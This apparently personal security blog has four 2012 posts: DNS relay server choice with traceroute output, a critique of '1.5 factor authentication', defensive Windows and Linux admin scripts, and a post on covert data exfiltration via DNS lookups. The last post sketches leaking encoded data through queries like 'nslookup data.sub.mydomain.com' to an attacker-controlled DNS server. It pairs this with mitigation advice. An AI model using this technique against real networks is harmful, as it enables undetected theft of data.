Wednesday, 5 December 2012

DNS relay servers

This one maybe boring security for some, but a lot of people I meet who claim to be in security forget the very important, possibly critical CIA model of security. No I don't mean the Central Intelligence Agency, I mean Confidentiality, Integrity and Availability. These three things are the key to good security infrastructure, and DNS is part of at least the last two.

Generally speaking if you are a small to medium business, you will have a DNS server in your environment. You could just leave it as default pointed to the root servers to do external resolutions for your clients, but in geographically disperet countries like Australia that can lead to resolutions failures due to the latency to the root servers that is sometimes experienced. If you have a big enough pipe this latency is manageable and won't cause an issue, though a bit of contention can begin to cause problems. My suggestion was usually to specify DNS relay servers. This allows you to relay your requests to your ISP, especially good if your ISP blocks lookups to the root servers which I have also seen. But should you just specify your ISP's DNS... well when I first started doing this that is what I did. Till the ISP the client was using had their DNS cache poisoned and a few popular sites started coming badly, and other times where the ISPs DNS failed or changed without notice.
So I started setting a second or third that was with a different ISP, but was known publically accessable, either Optus or Telstra as they are/were our biggest ISP's in Australia at the time. I eventually started also adding OpenDNS and googles DNS to my reportaire, especially OpenDNS's premium services with clients that wanted the blocking that a proxy gives without the infrastructure or upfront cost, yes I know you can get round it by simply knowing the ip of a malicious site, but it was better than unencumbered internet feeds. I am not a shill I don't even have an OpenDNS account anymore.

This worked very well. But just today while troubleshooting an issue I fired up WinMTR, a windows port of the Linux tool Multi-Trace-Route (MTR), very useful at finding a hop in your route that could be having issues. As usual I used these memorised Optus and Telstra DNS servers to check my routes and I found packet loss (there was an issue with my ISP's bridging router into PIPE it seemed). Then I tested to my ISP's DNS, all good no packets dropped and only 4 hops, then I thought hmm I should test to googles open DNS servers, just to see;
|-----------------------------------------------------------------------------------------------------|
|                                      WinMTR statistics                                                                   |
|                       Host                  -                  %  | Sent | Recv | Best | Avrg | Wrst | Last |
|-------------------------------------------------------|-------|-------|-------|-------|--------|-------|
|                  x-x-x-x.tpgi.com.au -                  0 |      5 |    55  |      1  |      3 |      81 |      4 |
|                 x.x.x-x.tpgi.com.au -                    2 |    55 |    54  |     23 |    28 |    114 |    24 |
| syd-nxg-men-crt2-ge-3-1-0.tpgi.com.au -    0 |    55 |    55  |     48 |    69 |    159 |    67 |
|                            202.7.171.46 -                    0 |    55 |    55  |     25 |    33 |    124 |    28 |
|                            72.14.237.21 -                    4 |    55 |    53  |     26 |    28 |      43 |    32 |
|          google-public-dns-a.google.com -       2 |    54 |    53  |     44 |    70 |    151 |    76 |
|_____________________________________|______|______|______|______|______|
   WinMTR - 0.8. Copyleft @2000-2002 Vasile Laurentiu Stanimir  ( stanimir@cr.nivis.com )

Yeah there is a little packet loss there, issues with my connection, but only 6 hops is impressive. It wasn't this way when it first started, I remember using google dns early on and seeing latency of 100+ms and about 10-15hops, I quickly realised of course they are google, they are now using Anycast, a quick traceroute from elsewhere in the world (thanks to centralops tools)confirmed this due to the different route (more hops lower response time, but the first 5 are internal);
1 1 1 1 70.84.211.97 61.d3.5446.static.theplanet.com
2 0 0 0 70.87.254.1 po101.dsr01.dllstx5.networklayer.com
3 0 0 0 70.85.127.105 po51.dsr01.dllstx3.networklayer.com
4 2 0 0 173.192.18.228 ae16.bbr02.eq01.dal03.networklayer.com
5 0 0 0 173.192.18.208 ae7.bbr01.eq01.dal03.networklayer.com
6 0 0 0 50.97.16.37
7 1 0 0 72.14.233.77
8 1 1 0 72.14.237.219
9 7 7 7 216.239.47.121
10 7 7 7 216.239.46.59
11 * * *

12 7 7 7 8.8.8.8 google-public-dns-a.google.com


So, moral of the story. If like me you are using one of the aformentioned or external DNS in replacement or addition to your ISP, now is a good time to move to Googles DNS, as it is probably faster than everyone else bar your ISP, and gives you a bit of redundancy. As one of my colleagues used to joke, if Google is down, the internet is down.
I did read something interesting in my travels researching this, Geographic aware DNS (aka GeoDNS), there is a patch for Bind and a fork of DJBDNS here; http://geoipdns.org/. Interesting, it is a similar idea I discussed with a colleague a few years ago and tested implementing in a kluge style way with Microsofts DNS server, this implementation is a lot smoother however.

Oh and there is an update to my previous post on 1.5 factor auth.

Tuesday, 13 November 2012

"1.5 factor authentication"?

A colleague recently tried to convince me that "1.5 factor authentication" was better than 1 factor so I decided to look into it.

First some basics, generally speaking Authentication works at its most basic level on computer systems via a username and password. This is 1-factor authentication. It is something that is unprotected and possibly public your username and something that should be kept hidden and secret your password or passphrase.
The 2nd factor of authentication in 2 factor authentication is the combination of something you have, some kind of encrypted token (usb key, rfid token, smart card, numeric-alpha numeric token; ala RSA SecureID and Wikid soft tokens).
The 3rd factor of authentication is something new, but it requires the first two in addition to another something you are. Eg; thumbprint, voice print, etc. Basically the 3rd factor is the addition of biometrics. I am really not a fan of biometrics as the only method of authentication as you can reissue a security token but you can't reissue your thumb. I can see having it in addition though would be workable.

See here for a more in-depth PCI view of these three widely accepted Authentication factors; http://pciguru.wordpress.com/2010/05/01/one-two-and-three-factor-authentication/

There is also a not yet well supported but interesting idea for a 4th factor. So in addition to all the other factors the computer or website or what-have-you authenticates that you are where you say you are. This 4th factor is hard to implement at the moment, and they are obviously trying to make it transparent to the end user, so say you have an app on your phone that fires up GPS and sends it through to ensure you are logging in from areas you have pre-defined. I actually heard of someone using log correlation years ago to this effect, basically they watched logins from the internal network and VPN concentrators and if a user attempted to VPN in from a geographically remote IP when they had only recently been seen more geographically locally or even on network then they would shut down the geographically remote session. I can't find the article now, but this supposed shut down a hacker trying to get into this USA based company using an Execs credentials via the VPN from South America when the exec had been seen on the local network only minutes earlier.
See here for more on 4th factor; http://blog.dustintrammell.com/2008/11/21/four-factor-authentication/

Now to get to 1.5 factor auth. I couldn't find much ;
Market-speak; http://blog.mailchimp.com/introducing-alterego-1-5-factor-authentication-for-web-apps/
Comment decrying it for being touted as 2 factor auth; http://stackoverflow.com/questions/559639/what-is-two-factor-authentication
Market-speak, but interesting implementation; http://pingrid.org/
Very aptly named blog; http://www.ryanhicks.net/blog/2008/10/15-factor-authentication.html
But onto this colleagues definition: 1.5 factor auth is a password and a pin... So still two things that you know. Yes it maybe prettied up in the case of pingrid or horrible and easy to break as in the case of the below screenshot from a banking institution here in Australia that I used to use, but still two somethings that you know, by definition still one factor, aka one of the definitions of factors above.

Onto the example I mentioned earlier, I used to use a financial institution that I believe started using the below (this is a mock-up I no longer have an account there) "extra factor" in 2003, I laughed when I first saw it, realising it added no real security. The idea is that you pick three images and you have to click them in order, the images get shuffled each login.
As I watched after more logins I noticed that the pictures changed, every time, except the pictures I as a user had to click, so if a user had my username and password they could simply login several times see the picture auth, note down the pictures then exit, do this a large enough number of times and like a game of "guess who" you have narrowed down the pictures needed to authenticate in this step. As there are only three and you need to click them in order you have to only make 6 failed attempts and you will have it.

The problem with this 1.5 factor is depending on the implementation it could be almost 50% more security that 1 factor but in the case of the above image that is probably 1.0000000000000001 factor. The other issue is even if it is 50% better than 1 factor it is not 50% worse than 2 factor, 2 factor is insanely better than 1 factor, coming back to implementation of course but even the worst is orders of magnitude better. Have a look at how complex pingrid is, I doubt that most end users would pick this up quickly and I would say 90% will write down what they have to do and what they do, do to get authenticated, this makes it no longer something that is kept secret, and may make authentication for legitimate users so hard that they fail more often, causing increased support calls and decreased productivity.

This half factor addition is bad market speak at best, and a false sense of security with a move to introducing vulnerabilities in the authentication chain at worst.

UPDATE: Being the security geek I am, I decided to email the venerable Bruce Schneier and his word from on high matches my own, "It doesn't (add security). It's a marketing ploy." Squeee I got a reply for Bruce Schneier... but yeah 1.5 factor is bs, coffin closed and put to bed.

Tuesday, 11 September 2012

Securing your environment



So a recent risky.biz podcast (ep 252 here; http://risky.biz/RB252) prompted me to write this.
The host, Patrick Grey, Adam Boileau and later HD Moore were talking about the recent mass ownage of 30,000 workstations at Aramco, ouchies. Some of the things that were mentioned I have done before so I thought I would get them out there;

First up Administrative monitoring in a Windows Domain, trivially easy, should only take 15minutes at most to setup.

On one of your DC's create a group-audit.vbs file as below

'  Rem this script will query a group
sLDAPPath = WScript.Arguments.Item(0)
'wscript.echo sLDAPPath
 
strTargetGroupDN = "LDAP://" & sLDAPPath &""
EnumNestedgroup strTargetGroupDN
Function EnumNestedgroup(strGroupDN)
    Set objGroup = GetObject(strGroupDN)
    For Each objMember in objGroup.Members
        If (LCase(objMember.Class) = "group") Then
            wscript.echo objMember.AdsPath
            EnumNestedgroup objMember.AdsPath
        Else
            Wscript.Echo objMember.DisplayName & " ; " & objMember.Mail
        End If
    Next
    Set objGroup = Nothing
End Function

Then in a batch file run the below for each group (in the CN, I suggest domain adminis, administrators, enterprise admins, schema admins and any other privleged group) you want to monitor (different log files at the end) Then just diff them at the end of the script and email (blat is your friend) if there are any differences.
cscript //nologo C:\scripts\group-audit.vbs "CN=Domain Administrators,CN=Builtin,DC=DOMAIN,DC=TLD" > C:\scripts\administrators.log

Sudoers/Root group monitoring for Linux;
similar to our windows script run the below depending on the groups you need to monitor then diff the results from a previous time then pipe out to email, if you don't have getent use (grep ^GROUPNAME /etc/group). Then just sendemail (the Linux equivalent of blat) at the end if there is an error;
mv \root\logs\sudoers.log \root\logs\old\
mv \root\logs\root.log \root\logs\old\
getent group sudoers > \root\logs\sudoers.log
getent group root > \root\logs\root.log
diff  \root\logs\sudoers.log \root\logs\old\sudoers.log
diff  \root\logs\root.log \root\logs\old\root.log 

Inactive accounts check and if your really harsh disable in windows;
The 12 below is the number of weeks to look for, this is not foolproof sometimes accounts will show up that have been active more recently;
dsquery user -inactive 12 -limit 0 |find /v "OU=Disabled Accounts(Good idea to have this OU)" |find /v "OU=ANY OU YOU WANT TO IGNORE" > c:\scripts\inactive.txt
rem this is the disable part remove the double % if not used in a batch script. Hope you don't have # in your usernames too :)
for /f "delims=#" %%a in ('type c:\scripts\inactive.txt"') do (
    dsmod user %%a -disabled yes
  dsmove %%a -newparent "ou=Disabled Accounts,,
DC=DOMAIN,DC=TLD"

SSH monitoring for Linux, Fail2Ban or Denyhosts, use one or the other, love it.

Different local admins per computer, this idea came from a colleague that worked at a big multinational who said they had this as a standard, very cool idea. This will stop viruses and worms that simply learn the local admin then propagate via admin$ shares using this wherever they can. It won't stop a committed attacker who will probably work out the system (you can increase the password length by increasing the 15 on the set final pass, heck even do a second different md5 of something). This should be put in a batch file that is then set via scheduled task to run at midnight, you can go even further and set it to run hourly extending the thedate variables;

set thedate=%date:~4,10%
set passphrase="PASSWORD HERE"
for /f %%a in ('c:\stat\md5.exe -d%computername%%passphrase%%thedate:/=-%') do Set pass=%%a
set finalpass=%pass:~0,15%

net user LOCALADMIN %finalpass%

Then to retrieve the computers password simply run the below batch file, obviously protect the passphrase and retrieval batchfile somehow, and if just anyone can access the script on the local pc then they can see what the password is, so lock it down with permissions;

set /p computer="Enter computer hostname: " %=%
for /f %%a in ('c:\stat\md5.exe -d%computer%%passphrase%%thedate:/=-%') do Set pass=%%a
echo %pass:~0,15%

Workstation and server hardening.
This is a massive topic that people have written hundreds of volumes on, but really keep all your stuff up to date and look at what lockdown stuff is in your OS, obviously easier said than done, otherwise something like 80% of breaches wouldn't occur.
For network lockdown in windows there is the windows firewall, IP filtering(Windows 2003 only), and IPsec policy that can all easily lock down ports and applications. 
On Linux there is iptables, which is easy enough to use, see here for a quick guide http://richmorrison.net/?p=36

Generally speaking you limit the number of local admins/super users on any OS', so monitor this too. Monitor your important groups, heck on a windows workstation the below will do the trick;
net localgroup administrators > c:\scripts\local-admin.log
then diff it from last time and alert on difference.

Av is dead, so is blacklisting. Sure keep av running to protect any systems that don't have your kick ass whitelisting enabled. Use something simple, Clam is my favorite for simple effective av, cross platform too, windows you probably need more depending on what the machine is used for and your budget. I am generally pretty loathe to put more and more agents on servers, as one will always eventually cause a crash, so they really have to add value on an immense scale for me to say ok.
For filesystem and application lockdown; in windows there is Software restriction policy (SRP) and app locker, which from my playing around looks like a gussied up version of SRP. I would suggest if you have applocker use it to whitelist a clean system then block everything else and you are pretty safe for the time being, I can't find any info on the hash applocker uses but even if it is md5 the chance that some random attacking your server/pc is going to be able to generate an exe with their payload that has a hash collision with an existing file is pretty small. Of course if you chose signed exe's then some of the more recent possible state sponsored malware that comes signed will still get you, but then you could just hash your whole clean system and be pretty damn safe.
If you are stuck on an older system with just SRP you can still hash your files, heck you can use something md5deep or sha1deep to get all the hashes you need and script creation of your rules, or just compare the hashes later as a form of poor mans tripwire.
On Linux you have apparmor and SElinux, I prefer SElinux's approach but Apparmor is much easier to configure without breaking things. It is horses for courses, but I would recommend whichever way you go, don't go with the distros rather relaxed default. 
There are guides out there, so I am not going to reproduce them for SRP, app armour, SElinux and Apparmour, so go google. Another one I didn't mention as I have yet to have a decent play with it, is El Jefe (http://www.immunityinc.com/products-eljefe.shtml), which although being another agent does live processor monitoring and trending which is pretty cool.

Network segregation; really that is it, segregate your servers based on what they do, limit communication between them with a firewall. Easy to do get ipcop or smoothwall if you have no cash, think does this device really need to talk to that device, if no then why can it. 

This is all simpler said than done. But there you have it just a quick dump of protections that I have used and would recommend. Some of these you can get in with no pain, this was just meant to be a quick few scripts I have written over the years but ended up a diatribe against add-ons and a spruik of built in features... Ah well I hope it is of use to someone.

Thursday, 19 January 2012

Easy data exfiltration

I had this thought last night as I was falling to sleep, and I realise it has probably already been talked about but I will explain how easy it is to do and how hard it is for existing detections to detect.
So my idea is basic data exfiltration via DNS lookups. Say you are sitting on an internal machine, you logged on as a local user through some exploit via boot disk or what not. You probably don't have internet access and you can't install a tunnelling tool, you don't want to set off the local HIDS of the machine by plugging in an unknown USB stick, so what do you do?
Well if you already have a DNS server running on a server you control, pre-setup for something like DNS tunnelling, or just legitimately resolving your own domains. Now your existing DNS server you need to turn on verbose logging for one of your subdomains, this is pretty easy to do on BIND or even in Windows's DNS server. Then simply encode from the local machine anyway you want, or if you can't encode it don't and just do an nslookup data.sub.mydomain.com, bear in mind the whole lookup can't be longer than 255 characters and the subdomain can be 63 characters tops, if you need to use some special characters then you will need to either encode in base32 or use some system in your head.

Mitigation: Do your client machines really need to resolve every site, surely they are going through a proxy or application aware firewall that can do the DNS lookups for them. The issue of course with this is most networks now use DNS to resolve internal services, and usually the DNS servers that service these requests are allowed to go to the internet in some way, and the proxies or firewalls refer back to these internal DNS servers as they would also point to resources the proxies need like authentication. The only suggestion then is to more finely split your DNS server infrastructure up. Specific internal DNS servers that are allowed to do lookups to both the internal DNS servers and the wider internet, but the only device internally that is allowed to these is the proxy server. Of course depending on the way your proxy server works it may not wait for the client to be authenticated before it does a lookup so the lookups could simply be proxied through the compromised machines web browser that is connected to the proxy.

Feel like donating to me, Bitcoin; 1BASSxgFZ2j8VfXFrWJHNvYdQXDtJKAUuN or Ethererum; 0x2887D4B4fe1a7162D260CeA7E1131AF8926bd87F